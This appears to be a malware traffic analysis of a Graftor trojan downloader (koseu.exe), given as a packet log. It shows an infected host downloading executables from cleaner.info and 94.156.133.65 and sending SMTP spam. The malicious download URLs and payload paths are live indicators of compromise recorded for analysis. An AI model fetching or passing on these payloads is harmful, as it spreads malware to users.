Text Example

Koseu.exe sathishkumar_n10@rediffmail.com Malware David57@0114.com Mikey Graftor Trojan Downloader PCAP Download Sample

https://www.virustotal.com/fr/file/b43fffd7896832a0876ce7c950a57450c37c733fd3b8080bbbbb84e798640338/analysis/1556983689/

2019-05-21 21:35:47.617598 IP 10.1.10.162.53171 > 50.87.249.186.80: Flags [P.], seq 1:424, ack 1, win 16425, length 423: HTTP: GET /koseu.exe HTTP/1.1
GET /koseu.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cleaner.info
Connection: Keep-Alive

2019-05-21 21:37:10.978863 IP 94.156.133.65.80 > 10.1.10.162.53680: Flags [.], seq 1461:2921, ack 145, win 237, length 1460: HTTP

RCPT TO: sathishkumar_n10@rediffmail.com

2019-05-21 21:37:17.465016 IP 10.1.10.162.53775 > 98.137.159.25.25: Flags [P.], seq 17:48, ack 77, win 16406, length 31: SMTP: MAIL FROM: David57@0114.com
MAIL FROM: David57@0114.com

2019-05-21 21:35:47.698035 IP 50.87.249.186.80 > 10.1.10.162.53171: Flags [.], ack 424, win 237, length 0

Content-Encoding: gzip

2019-05-21 21:35:47.961939 IP 10.1.10.162.53171 > 50.87.249.186.80: Flags [.], ack 4325, win 16425, length 0

2019-05-21 21:35:48.006558 IP 10.1.10.162.53171 > 50.87.249.186.80: Flags [P.], seq 424:829, ack 4325, win 16425, length 405: HTTP: GET /wp-content/themes/sydney/css/bootstrap/bootstrap.min.css?ver=1 HTTP/1.1
GET /wp-content/themes/sydney/css/bootstrap/bootstrap.min.css?ver=1 HTTP/1.1
Accept: */*
Referer: http://cleaner.info/koseu.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cleaner.info
Connection: Keep-Alive

2019-05-21 21:35:48.306312 IP 10.1.10.162.53175 > 50.87.249.186.80: Flags [P.], seq 396:802, ack 3370, win 16425, length 406: HTTP: GET /wp-content/themes/sydney/js/skip-link-focus-fix.js?ver=20130115 HTTP/1.1
GET /wp-content/themes/sydney/js/skip-link-focus-fix.js?ver=20130115 HTTP/1.1
Accept: */*
Referer: http://cleaner.info/koseu.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cleaner.info
Connection: Keep-Alive

2019-05-21 21:35:48.312292 IP 50.87.249.186.80 > 10.1.10.162.53171: Flags [.], seq 9775:11235, ack 1221, win 254, length 1460: HTTP: HTTP/1.1 200 OK

X-Proxy-Cache: MISS
Content-Encoding: gzip


2019-05-21 21:35:48.547694 IP 10.1.10.162.53171 > 50.87.249.186.80: Flags [P.], seq 1221:1619, ack 15066, win 16425, length 398: HTTP: GET /wp-content/themes/sydney/fonts/fontawesome-webfont.eot? HTTP/1.1
GET /wp-content/themes/sydney/fonts/fontawesome-webfont.eot? HTTP/1.1
Accept: */*
Referer: http://cleaner.info/koseu.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cleaner.info
Connection: Keep-Alive

2019-05-21 21:36:01.486633 IP 10.1.10.162.53184 > 94.156.133.65.80: Flags [P.], seq 1:422, ack 1, win 16425, length 421: HTTP: GET /55.exe HTTP/1.1
GET /55.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 94.156.133.65
Connection: Keep-Alive

2019-05-21 21:36:19.539006 IP 10.1.10.162.53186 > 94.156.133.65.80: Flags [P.], seq 1:142, ack 1, win 16425, length 141: HTTP: GET /a/p.txt HTTP/1.1
GET /a/p.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 94.156.133.65

2019-05-21 21:36:28.136168 IP 10.1.10.162.53188 > 94.156.133.65.80: Flags [P.], seq 142:285, ack 250, win 16362, length 143: HTTP: GET /a/369.txt HTTP/1.1
GET /a/369.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 94.156.133.65

2019-05-21 21:36:28.361090 IP 94.156.133.65.80 > 10.1.10.162.53188: Flags [.], seq 250:1710, ack 285, win 245, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 22 May 2019 01:36:28 GMT

2019-05-21 21:36:37.871707 IP 10.1.10.162.53238 > 98.137.159.25.25: Flags [P.], seq 1:17, ack 45, win 16414, length 16: SMTP: HELO [0.0.0.0]
HELO [0.0.0.0]

2019-05-21 21:36:37.874589 IP 10.1.10.162.53184 > 94.156.133.65.80: Flags [P.], seq 422:843, ack 427276, win 65096, length 421: HTTP: GET /44.exe HTTP/1.1
GET /44.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 94.156.133.65
Connection: Keep-Alive

2019-05-21 21:36:37.876216 IP 10.1.10.162.53243 > 98.137.159.25.25: Flags [S], seq 2705971778, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0

2019-05-21 21:37:10.757275 IP 10.1.10.162.53680 > 94.156.133.65.80: Flags [P.], seq 1:145, ack 1, win 16425, length 144: HTTP: GET /porn/p.txt HTTP/1.1
GET /porn/p.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 94.156.133.65
